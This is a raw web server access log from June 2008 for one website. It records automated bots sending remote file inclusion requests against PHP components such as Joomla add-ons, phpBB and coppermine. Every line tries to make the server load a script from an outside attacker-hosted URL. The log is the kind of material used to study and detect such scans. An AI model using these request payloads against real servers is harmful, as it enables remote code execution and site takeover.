193.242.119.110 - - [22/Jun/2008:21:50:41 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
193.242.119.110 - - [22/Jun/2008:21:50:42 -0700] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
193.242.119.110 - - [22/Jun/2008:21:50:42 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
64.72.112.158 - - [22/Jun/2008:21:51:04 -0700] "GET /logs/access_080211.log/include/logout.php?PSA_PATH=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "neighborhoodglimpses.com"
64.72.112.158 - - [22/Jun/2008:21:51:04 -0700] "GET /include/logout.php?PSA_PATH=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "neighborhoodglimpses.com"
64.72.112.158 - - [22/Jun/2008:21:51:04 -0700] "GET /logs/include/logout.php?PSA_PATH=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "neighborhoodglimpses.com"
193.242.119.110 - - [22/Jun/2008:21:51:07 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
193.242.119.110 - - [22/Jun/2008:21:51:08 -0700] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
193.242.119.110 - - [22/Jun/2008:21:51:08 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
217.20.175.69 - - [22/Jun/2008:21:53:00 -0700] "GET /logs/access_080211.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.20.175.69 - - [22/Jun/2008:21:53:00 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
74.208.46.46 - - [22/Jun/2008:21:55:25 -0700] "GET /logs/access_080211.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
74.208.46.46 - - [22/Jun/2008:21:55:26 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
74.208.46.46 - - [22/Jun/2008:21:55:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
200.31.206.138 - - [22/Jun/2008:21:55:34 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
200.31.206.138 - - [22/Jun/2008:21:55:34 -0700] "GET /lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
65.18.221.170 - - [22/Jun/2008:21:56:40 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.neighborhoodglimpses.com"
65.18.221.170 - - [22/Jun/2008:21:56:40 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:21:59:34 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:21:59:37 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.72.112.158 - - [22/Jun/2008:21:59:48 -0700] "GET /logs/include/logout.php?PSA_PATH=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
64.72.112.158 - - [22/Jun/2008:21:59:48 -0700] "GET /include/logout.php?PSA_PATH=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:22:00:31 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:22:00:34 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.17.93.163 - - [22/Jun/2008:22:01:22 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:04:49 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:04:50 -0700] "GET //?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:04:50 -0700] "GET /logs//?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:07:19 -0700] "GET /logs/access_080211.log//?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:07:19 -0700] "GET //?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:07:20 -0700] "GET /logs//?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
74.53.178.146 - - [22/Jun/2008:22:10:46 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.178.146 - - [22/Jun/2008:22:10:47 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.178.146 - - [22/Jun/2008:22:10:47 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:10:55 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:10:55 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:10:55 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
200.31.206.138 - - [22/Jun/2008:22:10:59 -0700] "GET /lostpasswd.php?env[include_prefix]=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
200.31.206.138 - - [22/Jun/2008:22:11:00 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:11:07 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:11:07 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:11:07 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:11:23 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:11:26 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:11:26 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:11:34 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:11:34 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:11:34 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:12:03 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:12:03 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:12:03 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:13:51 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:13:51 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:13:51 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
83.85.62.68 - - [22/Jun/2008:22:13:54 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:14:18 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:14:18 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:14:18 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
72.34.226.62 - - [22/Jun/2008:22:17:03 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
72.34.226.62 - - [22/Jun/2008:22:17:03 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
72.34.226.62 - - [22/Jun/2008:22:17:03 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
72.34.226.62 - - [22/Jun/2008:22:17:03 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
72.34.226.62 - - [22/Jun/2008:22:17:04 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
72.34.226.62 - - [22/Jun/2008:22:17:04 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
83.85.62.68 - - [22/Jun/2008:22:19:40 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
83.85.62.68 - - [22/Jun/2008:22:19:40 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
83.85.62.68 - - [22/Jun/2008:22:19:40 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
64.38.46.234 - - [22/Jun/2008:22:21:40 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.neighborhoodglimpses.com"
64.38.46.234 - - [22/Jun/2008:22:21:40 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.neighborhoodglimpses.com"
83.85.62.68 - - [22/Jun/2008:22:22:11 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
83.85.62.68 - - [22/Jun/2008:22:22:12 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
211.198.234.6 - - [22/Jun/2008:22:24:50 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.198.234.6 - - [22/Jun/2008:22:24:50 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.198.234.6 - - [22/Jun/2008:22:24:50 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
193.242.119.110 - - [22/Jun/2008:22:24:54 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
193.242.119.110 - - [22/Jun/2008:22:24:54 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
193.242.119.110 - - [22/Jun/2008:22:24:54 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
193.242.119.110 - - [22/Jun/2008:22:24:54 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
193.242.119.110 - - [22/Jun/2008:22:24:55 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
193.242.119.110 - - [22/Jun/2008:22:24:55 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:28:12 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:28:13 -0700] "GET //?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:28:13 -0700] "GET /logs//?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.254.34.12 - - [22/Jun/2008:22:29:23 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
64.254.34.12 - - [22/Jun/2008:22:29:23 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
64.254.34.12 - - [22/Jun/2008:22:29:23 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:22:29:42 -0700] "GET /logs/access_080211.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:22:29:42 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:22:29:42 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
216.236.255.134 - - [22/Jun/2008:22:30:43 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:22:31:12 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
211.198.234.6 - - [22/Jun/2008:22:34:34 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.198.234.6 - - [22/Jun/2008:22:34:35 -0700] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
211.198.234.6 - - [22/Jun/2008:22:34:35 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:35:11 -0700] "GET /logs/access_080211.log//?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:35:11 -0700] "GET //?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
81.92.215.103 - - [22/Jun/2008:22:35:11 -0700] "GET /logs//?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 200 3946 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:22:35:17 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:22:39:25 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:22:39:25 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:22:39:25 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
200.31.206.138 - - [22/Jun/2008:22:39:29 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
200.31.206.138 - - [22/Jun/2008:22:39:30 -0700] "GET /lostpasswd.php?env[include_prefix]=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
62.149.237.4 - - [22/Jun/2008:22:40:48 -0700] "GET /logs///modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
62.149.237.4 - - [22/Jun/2008:22:40:49 -0700] "GET ///modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:40:58 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:40:58 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.15.147.86 - - [22/Jun/2008:22:40:59 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
